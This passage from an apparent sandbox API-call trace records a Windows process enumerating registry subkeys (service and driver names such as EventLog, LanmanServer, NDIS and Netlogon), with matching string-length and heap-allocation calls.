RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b58e8 [0175.509] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x10, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="EFS", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.509] lstrlenW (lpString="EFS") returned 3 [0175.509] GetProcessHeap () returned 0x4a0000 [0175.509] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x8) returned 0x4b5248 [0175.509] GetProcessHeap () returned 0x4a0000 [0175.509] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b58c8 [0175.509] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x11, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="EventLog", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.509] lstrlenW (lpString="EventLog") returned 8 [0175.509] GetProcessHeap () returned 0x4a0000 [0175.509] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x12) returned 0x4b58a8 [0175.510] GetProcessHeap () returned 0x4a0000 [0175.510] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5888 [0175.510] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x12, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="File system", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.510] lstrlenW (lpString="File system") returned 11 [0175.510] GetProcessHeap () returned 0x4a0000 [0175.510] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x18) returned 0x4b5868 [0175.510] GetProcessHeap () returned 0x4a0000 [0175.510] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5848 [0175.510] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x13, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Filter", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.510] lstrlenW (lpString="Filter") returned 6 [0175.510] GetProcessHeap () returned 0x4a0000 [0175.510] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0xe) returned 0x4b5ed0 [0175.510] GetProcessHeap () returned 0x4a0000 [0175.511] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5828 [0175.511] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x14, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HelpSvc", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.511] lstrlenW (lpString="HelpSvc") returned 7 [0175.511] GetProcessHeap () returned 0x4a0000 [0175.511] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x10) returned 0x4b5ee8 [0175.511] GetProcessHeap () returned 0x4a0000 [0175.511] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5808 [0175.511] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x15, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IKEEXT", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.511] lstrlenW (lpString="IKEEXT") returned 6 [0175.512] GetProcessHeap () returned 0x4a0000 [0175.512] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0xe) returned 0x4b5f00 [0175.512] GetProcessHeap () returned 0x4a0000 [0175.512] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b57e8 [0175.512] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x16, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="ipnat.sys", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.512] lstrlenW (lpString="ipnat.sys") returned 9 [0175.512] GetProcessHeap () returned 0x4a0000 [0175.512] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b57c8 [0175.512] GetProcessHeap () returned 0x4a0000 [0175.512] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b57a8 [0175.512] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x17, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="KeyIso", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.513] lstrlenW (lpString="KeyIso") returned 6 [0175.513] GetProcessHeap () returned 0x4a0000 [0175.513] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0xe) returned 0x4b5f18 [0175.513] GetProcessHeap () returned 0x4a0000 [0175.513] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5788 [0175.513] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x18, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="LanmanServer", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.513] lstrlenW (lpString="LanmanServer") returned 12 [0175.513] GetProcessHeap () returned 0x4a0000 [0175.513] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x1a) returned 0x4b3ff0 [0175.513] GetProcessHeap () returned 0x4a0000 [0175.513] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5768 [0175.514] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x19, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="LanmanWorkstation", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.514] lstrlenW (lpString="LanmanWorkstation") returned 17 [0175.514] GetProcessHeap () returned 0x4a0000 [0175.514] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x24) returned 0x4b6f38 [0175.514] GetProcessHeap () returned 0x4a0000 [0175.514] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5748 [0175.514] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x1a, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="LmHosts", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.514] lstrlenW (lpString="LmHosts") returned 7 [0175.514] GetProcessHeap () returned 0x4a0000 [0175.514] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x10) returned 0x4b5f30 [0175.514] GetProcessHeap () returned 0x4a0000 [0175.514] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5728 [0175.515] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x1b, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Messenger", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.515] lstrlenW (lpString="Messenger") returned 9 [0175.515] GetProcessHeap () returned 0x4a0000 [0175.515] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5708 [0175.515] GetProcessHeap () returned 0x4a0000 [0175.515] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b56e8 [0175.515] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x1c, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="mrxsmb", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.515] lstrlenW (lpString="mrxsmb") returned 6 [0175.515] GetProcessHeap () returned 0x4a0000 [0175.515] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0xe) returned 0x4b5f48 [0175.515] GetProcessHeap () returned 0x4a0000 [0175.515] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b56c8 [0175.521] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x1d, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="mrxsmb10", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.521] lstrlenW (lpString="mrxsmb10") returned 8 [0175.521] GetProcessHeap () returned 0x4a0000 [0175.521] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x12) returned 0x4b56a8 [0175.521] GetProcessHeap () returned 0x4a0000 [0175.521] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5688 [0175.521] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x1e, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="mrxsmb20", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.521] lstrlenW (lpString="mrxsmb20") returned 8 [0175.521] GetProcessHeap () returned 0x4a0000 [0175.521] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x12) returned 0x4b5668 [0175.521] GetProcessHeap () returned 0x4a0000 [0175.521] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5648 [0175.522] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x1f, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="NativeWifiP", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.522] lstrlenW (lpString="NativeWifiP") returned 11 [0175.522] GetProcessHeap () returned 0x4a0000 [0175.522] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x18) returned 0x4b5628 [0175.522] GetProcessHeap () returned 0x4a0000 [0175.522] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5608 [0175.522] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x20, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="NDIS", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.522] lstrlenW (lpString="NDIS") returned 4 [0175.522] GetProcessHeap () returned 0x4a0000 [0175.522] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0xa) returned 0x4b5f60 [0175.522] GetProcessHeap () returned 0x4a0000 [0175.523] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b55e8 [0175.523] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x21, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="NDIS Wrapper", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.523] lstrlenW (lpString="NDIS Wrapper") returned 12 [0175.523] GetProcessHeap () returned 0x4a0000 [0175.523] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x1a) returned 0x4b3fc8 [0175.523] GetProcessHeap () returned 0x4a0000 [0175.523] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b55c8 [0175.523] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x22, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="ndiscap", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.523] lstrlenW (lpString="ndiscap") returned 7 [0175.523] GetProcessHeap () returned 0x4a0000 [0175.523] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x10) returned 0x4b5f78 [0175.523] GetProcessHeap () returned 0x4a0000 [0175.523] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b55a8 [0175.524] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x23, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Ndisuio", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.524] lstrlenW (lpString="Ndisuio") returned 7 [0175.524] GetProcessHeap () returned 0x4a0000 [0175.524] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x10) returned 0x4b5f90 [0175.524] GetProcessHeap () returned 0x4a0000 [0175.524] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5588 [0175.524] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x24, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="NetBIOS", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.524] lstrlenW (lpString="NetBIOS") returned 7 [0175.524] GetProcessHeap () returned 0x4a0000 [0175.524] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x10) returned 0x4b5fa8 [0175.524] GetProcessHeap () returned 0x4a0000 [0175.524] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5568 [0175.524] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x25, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="NetBIOSGroup", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.525] lstrlenW (lpString="NetBIOSGroup") returned 12 [0175.525] GetProcessHeap () returned 0x4a0000 [0175.525] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x1a) returned 0x4b3fa0 [0175.525] GetProcessHeap () returned 0x4a0000 [0175.525] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5548 [0175.525] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x26, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="NetBT", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.525] lstrlenW (lpString="NetBT") returned 5 [0175.525] GetProcessHeap () returned 0x4a0000 [0175.525] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0xc) returned 0x4b5fc0 [0175.525] GetProcessHeap () returned 0x4a0000 [0175.525] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5528 [0175.525] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x27, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="NetDDEGroup", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.525] lstrlenW (lpString="NetDDEGroup") returned 11 [0175.526] GetProcessHeap () returned 0x4a0000 [0175.526] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x18) returned 0x4b5508 [0175.526] GetProcessHeap () returned 0x4a0000 [0175.526] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b54e8 [0175.526] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x28, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Netlogon", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.526] lstrlenW (lpString="Netlogon") returned 8 [0175.526] GetProcessHeap () returned 0x4a0000 [0175.526] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x12) returned 0x4b54c8 [0175.526] GetProcessHeap () returned 0x4a0000 [0175.526] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b54a8 [0175.526] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x29, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="NetMan", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.526] lstrlenW (lpString="NetMan") returned 6 [0175.526] GetProcessHeap () returned 0x4a0000 [0175.526] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0xe) returned 0x4b5fd8 [0175.526] GetProcessHeap () returned 0x4a0000 [0175.527] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5488 [0175.527] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x2a, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="netprofm", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.527] lstrlenW (lpString="netprofm") returned 8 [0175.527] GetProcessHeap () returned 0x4a0000 [0175.527] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x12) returned 0x4b5468 [0175.527] GetProcessHeap () returned 0x4a0000 [0175.527] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5448 [0175.527] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x2b, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Network", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.527] lstrlenW (lpString="Network") returned 7 [0175.527] GetProcessHeap () returned 0x4a0000 [0175.527] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x10) returned 0x4b5ff0 [0175.527] GetProcessHeap () returned 0x4a0000 [0175.527] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5428 [0175.528] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x2c, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="NetworkProvider", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.528] lstrlenW (lpString="NetworkProvider") returned 15 [0175.528] GetProcessHeap () returned 0x4a0000 [0175.528] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x20) returned 0x4b4018 [0175.528] GetProcessHeap () returned 0x4a0000 [0175.528] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5408 [0175.528] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x2d, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="NlaSvc", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.528] lstrlenW (lpString="NlaSvc") returned 6 [0175.528] GetProcessHeap () returned 0x4a0000 [0175.528] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0xe) returned 0x4b6008 [0175.528] GetProcessHeap () returned 0x4a0000 [0175.528] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b53e8 [0175.528] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x2e, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Nsi", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.529] lstrlenW (lpString="Nsi") returned 3 [0175.529] GetProcessHeap () returned 0x4a0000 [0175.529] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x8) returned 0x4b5258 [0175.529] GetProcessHeap () returned 0x4a0000 [0175.529] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b66a8 [0175.529] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x2f, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="nsiproxy.sys", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.529] lstrlenW (lpString="nsiproxy.sys") returned 12 [0175.529] GetProcessHeap () returned 0x4a0000 [0175.529] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x1a) returned 0x4b4040 [0175.529] GetProcessHeap () returned 0x4a0000 [0175.529] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b66c8 [0175.529] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x30, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="NTDS", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.529] lstrlenW (lpString="NTDS") returned 4 [0175.530] GetProcessHeap () returned 0x4a0000 [0175.530] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0xa) returned 0x4b6020 [0175.530] GetProcessHeap () returned 0x4a0000 [0175.530] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b66e8 [0175.530] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x31, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="PCI Configuration", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.530] lstrlenW (lpString="PCI Configuration") returned 17 [0175.530] GetProcessHeap () returned 0x4a0000 [0175.530] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x24) returned 0x4b6f68 [0175.530] GetProcessHeap () returned 0x4a0000 [0175.530] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b6708 [0175.530] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x32, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="PlugPlay", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.530] lstrlenW (lpString="PlugPlay") returned 8 [0175.530] GetProcessHeap () returned 0x4a0000 [0175.530] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x12) returned 0x4b6728 [0175.530] GetProcessHeap () returned 0x4a0000 [0175.531] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b6748 [0175.531] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x33, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="PNP Filter", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.531] lstrlenW (lpString="PNP Filter") returned 10 [0175.531] GetProcessHeap () returned 0x4a0000 [0175.531] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x16) returned 0x4b6768 [0175.531] GetProcessHeap () returned 0x4a0000 [0175.531] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b6788 [0175.531] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x34, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="PNP_TDI", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.535] lstrlenW (lpString="PNP_TDI") returned 7 [0175.535] GetProcessHeap () returned 0x4a0000 [0175.535] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x10) returned 0x4b6038 [0175.535] GetProcessHeap () returned 0x4a0000 [0175.536] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b67a8 [0175.536] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x35, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="PolicyAgent", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.536] lstrlenW (lpString="PolicyAgent") returned 11 [0175.536] GetProcessHeap () returned 0x4a0000 [0175.536] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x18) returned 0x4b67c8 [0175.536] GetProcessHeap () returned 0x4a0000 [0175.536] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b67e8 [0175.536] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x36, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Primary disk", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.536] lstrlenW (lpString="Primary disk") returned 12 [0175.536] GetProcessHeap () returned 0x4a0000 [0175.536] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x1a) returned 0x4b4068 [0175.536] GetProcessHeap () returned 0x4a0000 [0175.537] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b6808 [0175.537] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x37, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="rdbss", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.537] lstrlenW (lpString="rdbss") returned 5 [0175.537] GetProcessHeap () returned 0x4a0000 [0175.537] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0xc) returned 0x4b6050 [0175.537] GetProcessHeap () returned 0x4a0000 [0175.537] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b6828 [0175.537] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x38, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="rdpencdd.sys", lpcchName=0x2bfd90, lpClass=0x0, 